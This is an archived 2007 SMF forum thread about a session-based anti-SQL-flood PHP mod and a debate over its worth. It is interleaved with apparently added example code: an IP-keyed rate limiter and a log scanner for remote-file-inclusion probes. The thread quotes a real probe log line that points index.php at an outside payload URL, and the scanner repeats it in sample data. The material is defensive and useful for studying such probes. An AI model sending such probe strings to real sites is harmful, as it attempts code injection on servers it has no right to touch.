Simple Machines Community Forum

Customizing SMF => SMF Coding Discussion => Topic started by: pixelsdream on December 18, 2007, 09:42:38 AM

Title: AntiSqlFlood by kike [SECURITY]
Post by: pixelsdream on December 18, 2007, 09:42:38 AM
Hi, I want to share with all of you one of my new modifications for SMF 1.1.4. It is a protection against SQL flood attacks.

(http://www.pixelsdream.com/antiflood.jpg)

First, create a new file called

antisqlflood.php

Second, copy and paste this code:


<?php
// AntiSqlFlood by kike ([email protected])
// www.pixelsdream.com
// This work is licensed under a Creative Commons license (http://creativecommons.org/licenses/by-nc-sa/2.5/es/)
session_start();
$tiempoespera = 30;              // minimum wait in seconds between two guarded requests from the same session
$session = "sqlfloodprotection"; // session key that stores the time of the last guarded request
if (isset($_SESSION[$session]) && $_SESSION[$session] >= time() - $tiempoespera)
{
	// A guarded request was seen less than $tiempoespera seconds ago: refuse this one and stop.
	exit("<center><img src='http://www.pixelsdream.com/antiflood.jpg' width='234' height='234' alt='antisqlflood by kike'/><b>Please wait 30 seconds before making another query or action.</b><br>Press <b><a href='index.php'>here</a></b> to return to the index<br><br><br>Sql Flood Protection for smf by Kike([email protected])<br>Developed by www.pixelsdream.com
<br>
<br>
<br>
 <a rel='license' href='http://creativecommons.org/licenses/by-nc-sa/2.5/es/'>
<img alt='Creative Commons License' style='border-width:0' src='http://creativecommons.org/images/public/somerights20.png' />
</a>
 </center>");
}
// Remember the time of this request for the next check.
$_SESSION[$session] = time();
// AntiSqlFlood by kike ([email protected])
// www.pixelsdream.com
// This work is licensed under a Creative Commons license (http://creativecommons.org/licenses/by-nc-sa/2.5/es/)
?>


Next, you need to protect the relevant actions in index.php.

Find this line:

global $modSettings, $settings, $user_info, $board, $topic, $maintenance, $sourcedir;

and add before it:

// antidos protection by kike ([email protected])
// Throttle the search and login actions, which each cost at least one expensive query.
// The action is checked with in_array() so that a request without ?action= does not
// trigger an undefined-index notice and so that only these exact values match.
if (isset($_GET['action']) && in_array($_GET['action'], array('search', 'search2', 'login', 'login2'), true))
{
	include 'antisqlflood.php';
}


That's all. Thanks for your attention and enjoy this modification.
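The post above keys its throttle on the PHP session, which only works for clients that return the session cookie. As an added example (not the author's code, and not part of the original post), here is the same idea keyed on the client IP address and stored in SQLite, so a flooder that discards cookies is still counted, with an explicit limit per window instead of a single "last request" timestamp. It assumes, hypothetically, that the SQLite file is writable by the web server and that `$_SERVER['REMOTE_ADDR']` is the real client address (no reverse proxy in front of Apache); the class and function names are invented for the example.

```php
<?php
// Added example, not the code from the post above: the same throttle keyed on
// the client IP and stored in SQLite instead of the PHP session, so clients
// that discard cookies are still counted. Hypothetical assumptions: the SQLite
// file is writable by the web server and REMOTE_ADDR is the real client.

class ActionThrottle
{
    private $db;
    private $window;  // length of the counting window, in seconds
    private $limit;   // guarded requests allowed per IP and action per window

    public function __construct($dbPath, $window = 30, $limit = 3)
    {
        $this->window = (int) $window;
        $this->limit  = (int) $limit;
        $this->db = new PDO('sqlite:' . $dbPath);
        $this->db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        $this->db->exec('CREATE TABLE IF NOT EXISTS throttle (
            ip TEXT NOT NULL, action TEXT NOT NULL, hits INTEGER NOT NULL,
            window_start INTEGER NOT NULL, PRIMARY KEY (ip, action))');
    }

    // Returns 0 when the request may proceed, otherwise the number of seconds
    // the client has to wait (usable directly as a Retry-After value).
    public function check($ip, $action, $now = null)
    {
        $now = ($now === null) ? time() : (int) $now;
        // BEGIN IMMEDIATE takes the write lock up front, so two concurrent
        // requests cannot both read the old counter and then both write it.
        $this->db->exec('BEGIN IMMEDIATE');
        try {
            $sel = $this->db->prepare('SELECT hits, window_start FROM throttle WHERE ip = ? AND action = ?');
            $sel->execute(array($ip, $action));
            $row = $sel->fetch(PDO::FETCH_ASSOC);

            if ($row === false || (int) $row['window_start'] + $this->window <= $now) {
                // No record yet, or the previous window has expired: start a new one.
                $ins = $this->db->prepare('INSERT OR REPLACE INTO throttle (ip, action, hits, window_start) VALUES (?, ?, 1, ?)');
                $ins->execute(array($ip, $action, $now));
                $wait = 0;
            } elseif ((int) $row['hits'] >= $this->limit) {
                // Over the limit: the refused request is not counted, only reported.
                $wait = (int) $row['window_start'] + $this->window - $now;
            } else {
                $upd = $this->db->prepare('UPDATE throttle SET hits = hits + 1 WHERE ip = ? AND action = ?');
                $upd->execute(array($ip, $action));
                $wait = 0;
            }
            $this->db->exec('COMMIT');
        } catch (Exception $e) {
            $this->db->exec('ROLLBACK');
            throw $e;
        }
        return $wait;
    }

    // Housekeeping: drop rows whose window has expired so the table stays small.
    public function prune($now = null)
    {
        $now = ($now === null) ? time() : (int) $now;
        $del = $this->db->prepare('DELETE FROM throttle WHERE window_start + ? <= ?');
        $del->execute(array($this->window, $now));
    }
}

// Same hook point as the post: only the search and login actions are guarded.
function throttle_smf_action(array $get, $ip, ActionThrottle $t, $now = null)
{
    $guarded = array('search' => true, 'search2' => true, 'login' => true, 'login2' => true);
    if (!isset($get['action']) || !is_string($get['action']) || !isset($guarded[$get['action']])) {
        return 0;  // not a guarded action, never throttled
    }
    return $t->check($ip, $get['action'], $now);
}

if (PHP_SAPI === 'cli') {
    // Stand-alone demonstration: in-memory database, fixed timestamps.
    $t  = new ActionThrottle(':memory:', 30, 3);
    $ip = '192.0.2.10';  // RFC 5737 documentation address, not a real client
    $waits = array();
    foreach (array(100, 101, 102, 103, 131) as $ts) {
        $waits[] = throttle_smf_action(array('action' => 'search2'), $ip, $t, $ts);
    }
    echo implode(' ', $waits), "\n";
} else {
    // Web glue for index.php, placed where the post puts its include.
    $t = new ActionThrottle(dirname(__FILE__) . '/throttle.sqlite', 30, 3);
    $wait = throttle_smf_action($_GET, $_SERVER['REMOTE_ADDR'], $t);
    if ($wait > 0) {
        header('HTTP/1.1 429 Too Many Requests');
        header('Retry-After: ' . $wait);
        exit('Too many requests; please wait ' . $wait . ' seconds.');
    }
}
```

Run from the command line it walks one address through five timestamps: the first three requests in a 30-second window pass, the fourth reports the seconds left in the window, and a request after the window expires passes again. Two caveats a practitioner should keep in mind: SMF starts its own session later in index.php, so a throttle that runs before it must not call `session_start()` itself (this one does not); and a per-IP counter is only as good as the address, so a botnet or a chain of proxies spreads its requests below the limit, which is the objection raised later in this thread.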
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: karlbenson on December 18, 2007, 10:55:24 AM
Nice, but you might want to change the image link to your own.

Especially since
a) the first link is a warez site
b) the site is suspended by the ISP (no doubt for a).
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: pixelsdream on December 18, 2007, 11:20:32 AM
Thanks, karlbenson, for the report; I changed the image and this works well.

P.S. Some SQL flooders can't support cookies, and sessions use cookies, so one good idea is to make a connection with MySQL to save all the times and IPs. If anyone wants this last modification, send me a mail ([email protected]) and I can share my latest code.

P.S.2: karlbenson, the site was suspended for abusive use of the server (an SQL flood attack). Somebody attacked my site, and I made this script to prevent new attacks.
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: rummie on December 18, 2007, 03:29:58 PM
No offense, but the code is stupid and a waste of time; also, it cannot do what it claims.

Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: pixelsdream on December 18, 2007, 04:05:46 PM
Have you tried the code? For my forum it is very useful, adding just a few lines :D
Haven't you tried an SQL flood attack??
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: rummie on December 18, 2007, 05:03:51 PM
OK... just read it... it's rubbish.

E107 has some good anti-flood code; download and study that, then return.
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: pixelsdream on December 18, 2007, 07:16:38 PM
You have no idea what SQL attacks I'm talking about... ¬¬
In my forum it works perfectly; you can test it. What's your forum, so I can check your mega-hyper-protection? xD
Your replies are the only rubbish in this post...
I have been studying PHP and MySQL for 5 years; do you want to teach me today? Don't make me laugh, please...
If you want to and you know PHP and MySQL, modify my script and replace sessions (cookies) with MySQL queries, and this script can be the best protection against SQL attacks :)

P.S. About the E107 anti-flood code, I don't know it; can you tell me the URL of this project, please?
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: rummie on December 19, 2007, 09:23:16 AM
Yes, you are right and I am wrong.
Forgive me for doubting you, oh master!

(LMAO)
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: Dragooon on December 19, 2007, 09:30:20 AM
.....@rummie: Your attitude wasn't appreciated, and no one is interested in your stupid replies.
If you have a reason why it is stupid, tell us.....

And if I get this right, this is to prevent spamming SQL queries. And this is for SMF, NOT E107.
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: Marook on December 19, 2007, 11:10:15 AM
Looks interesting, but can you explain the code? In your antisqlflood.php you're testing the session var sqlfloodprotection, but when will this var be set?
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: rummie on December 19, 2007, 11:16:44 AM
cv;foreach <?php //Auto edit for SMF
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: Marook on December 19, 2007, 11:28:33 AM
I will download E107 and check the flood protection. I've also written an 'antihacker' script, because every day hundreds of script kiddies want to find any security leaks and try to execute their bots on my site. ATM I'm checking every GET request, removing possible attack strings like SELECT, SCRIPT ... and comparing the original GET with the replaced one. If it's the same, everything went right. Otherwise you will get an error and be banned by .htaccess for 60 mins. What do you think about it? Is there any other way to figure out a possible hack attack?
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: karlbenson on December 19, 2007, 11:42:47 AM
If people are running bots, it's not too difficult to run the requests through a series of proxies.

Thus nullifying this script entirely.

I can think of a dozen ways to easily overload a forum, although for obvious reasons I wouldn't post them here.
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: Marook on December 19, 2007, 11:50:24 AM
Would you like to try it at my website? I could check the log files, and maybe I can improve the script...
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: karlbenson on December 19, 2007, 11:55:31 AM
I wouldn't bother. It would be a waste of time; just think about it.

You're thinking that attacks come from 1 person.
When in fact it could be 10, or even a small botnet, which could amount to hundreds.
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: Marook on December 19, 2007, 12:01:47 PM
Yes, you're right, but in the past it was almost always single script kiddies who wanted to inject some code. When a small botnet is attacking my site, all IPs get banned after the first try. This script works fine ATM, but I just want to improve it to avoid the daily script-kiddie Perl-script code injection ;)
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: karlbenson on December 19, 2007, 12:04:39 PM
I've never had a need for anything like this with SMF.

At the end of the day, the ONLY way to counter a DDoS attack is by server firewalls and IP blocking.
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: Marook on December 19, 2007, 12:12:05 PM

*********.net - - [18/Dec/2007:10:37:42 +0100] "GET /smf/index.php?x=http://dd3str0y3r.vilabol.uol.com.br/sk4n/safeon.txt?? HTTP/1.1" 302 353 "-" "libwww-perl/5.79"


This kind of request fills up my Apache log every day... and I just want a solution for all those who don't have a virtual or dedicated server like me. I just have web space, can't install a firewall, but am still searching for a way to prevent code injections.
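The log line quoted above is a remote-file-inclusion probe: the attacker passes a URL as a query-string value and hopes the script will include() it. As an added example (not code from any post in this thread), here is a small log-triage script that reads Apache combined-format lines and flags requests whose query parameters are absolute URLs, using the libwww-perl user agent only as a secondary signal. The three log lines in the demonstration are constructed for the example (the first mirrors the quoted one, with a documentation address in place of the masked host); the function names are invented.

```php
<?php
// Added example, not code from any post in this thread: triage an Apache
// combined-format access log for remote-file-inclusion probes like the line
// quoted above. The sample log lines below are constructed for this example.

function parse_combined_log_line($line)
{
    // host ident authuser [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;  // not a combined-format line
    }
    return array(
        'host' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $m[4],
        'status' => (int) $m[5], 'referer' => $m[7], 'ua' => $m[8],
    );
}

// Query-string values that are themselves absolute URLs are the signature of
// an RFI probe. The trailing "??" in the quoted line is meant to turn anything
// the vulnerable script appends into a harmless query string on the attacker's
// server, so it is matched on the prefix only.
function rfi_reasons(array $req)
{
    $reasons = array();
    $pos = strpos($req['path'], '?');
    if ($pos !== false) {
        parse_str(substr($req['path'], $pos + 1), $params);  // also URL-decodes the values
        foreach ($params as $name => $value) {
            if (is_string($value) && preg_match('#^(https?|ftp)://#i', $value)) {
                $reasons[] = "parameter '$name' is a remote URL";
            }
        }
    }
    // Secondary signal only: libwww-perl is the default agent of many mass
    // scanners, but legitimate scripts send it too, so never flag on it alone.
    if (count($reasons) > 0 && stripos($req['ua'], 'libwww-perl') === 0) {
        $reasons[] = 'libwww-perl user agent';
    }
    return $reasons;
}

// Returns one entry per suspicious line: client host, request path, response
// status and the reasons the line was flagged.
function scan_access_log(array $lines)
{
    $hits = array();
    foreach ($lines as $line) {
        $req = parse_combined_log_line($line);
        if ($req === null) {
            continue;
        }
        $reasons = rfi_reasons($req);
        if (count($reasons) > 0) {
            $hits[] = array('host' => $req['host'], 'path' => $req['path'],
                            'status' => $req['status'], 'reasons' => $reasons);
        }
    }
    return $hits;
}

if (PHP_SAPI === 'cli') {
    $sample = array(
        // constructed: same shape as the quoted line, client replaced by a documentation address
        '203.0.113.7 - - [18/Dec/2007:10:37:42 +0100] "GET /smf/index.php?x=http://dd3str0y3r.vilabol.uol.com.br/sk4n/safeon.txt?? HTTP/1.1" 302 353 "-" "libwww-perl/5.79"',
        // constructed: URL-encoded variant of the same probe, sent with a browser-like agent
        '203.0.113.7 - - [18/Dec/2007:10:37:43 +0100] "GET /smf/index.php?action=http%3A%2F%2Fdd3str0y3r.vilabol.uol.com.br%2Fsk4n%2Fsafeon.txt%3F%3F HTTP/1.1" 302 353 "-" "Mozilla/4.0"',
        // constructed: ordinary forum traffic, must not be flagged
        '198.51.100.4 - - [18/Dec/2007:10:38:01 +0100] "GET /smf/index.php?action=search2 HTTP/1.1" 200 8123 "http://forum.example/smf/index.php?action=search" "Mozilla/5.0"',
    );
    foreach (scan_access_log($sample) as $hit) {
        printf("%s %d %s\n  %s\n", $hit['host'], $hit['status'], $hit['path'], implode('; ', $hit['reasons']));
    }
}
```

The first two constructed lines are flagged and the third is not. Note what this does and does not give you: it is triage of the log, not a block list. As karlbenson points out below, SMF ignores the unknown parameter and the 302 in the log is the redirect to the board index, so the probe did no damage; feeding the flagged addresses into an .htaccess ban has the same limit as any IP-based ban, in that a scanner behind proxies or a botnet simply arrives from other addresses.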
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: karlbenson on December 19, 2007, 12:18:03 PM
But that's not going to do anything in SMF.

Actions are sanitized, escaped, preg_matched, validated, etc.

All you'll get there is an entry in your log, when in fact that user would simply have been redirected to the board index.
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: rummie on December 19, 2007, 12:23:54 PM
cv;foreach <?php //Auto edit for SMF
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: Marook on December 19, 2007, 12:29:12 PM
I've integrated the script into my SMF so the user would see a "hacking attempt" message (index.php?action=error) and will be banned ;) But back to the topic... I'm now reading something about SQL floods.

@rummie: all you said is already done ;) I plan to deny Perl scripts, but ATM I use it to gather information about the attacks.
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: pixelsdream on December 19, 2007, 01:10:45 PM
/ignore rummie (if you don't like it, simply don't use it! Do you want a demonstration of an SQL query flood on your forum before and after using my code??)

If somebody wants the latest version of this modification, PM or mail me. I improved some parts of the source and now it works with MySQL; I haven't received any more SQL query flood attacks with the latest code.
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: rummie on December 19, 2007, 01:22:25 PM
If you want people to use your code, make it public domain or LGPL (and yes, improve it), and not this "Creative Commons/Non-Commercial bull******".
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: Marook on December 19, 2007, 03:21:49 PM
I just wanted to know how it works...
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: rummie on December 19, 2007, 04:50:58 PM
cv;foreach <?php //Auto edit for SMF
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: pixelsdream on December 20, 2007, 02:46:19 PM
I don't like to repeat things...
IN MY FORUM IT WORKS WELL!! :)

The work is the same as this:
http://scripts.ringsworld.com/development-tools/flood-protection/flood-protection.php.html
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: rummie on December 20, 2007, 03:03:50 PM
Quote from: pixelsdream on December 20, 2007, 02:46:19 PM
I don't like to repeat things...
IN MY FORUM IT WORKS WELL!! :)

The work is the same as this:
http://scripts.ringsworld.com/development-tools/flood-protection/flood-protection.php.html

That stupid code you linked to is dumber than yours!! :D lol!

[rant]Doesn't anybody even **** READ code anymore??? [/rant]


sigh
Title: Re: AntiSqlFlood by kike [SECURITY]
Post by: mdshare on January 20, 2008, 10:55:48 PM
Any little thing that helps against attacks is welcome.

I've been under heavy attack the past months... even changed to vBulletin (didn't help), so I switched back to SMF.

The attack I had was a heavy SQL flood attack by multiple bots.

From what I have seen, those **** can crash any forum engine... even getting them booted from their web host... (yes, even from Lunarpages, which is so close to SMF).

I really hope SMF comes up with a decent solution against this issue.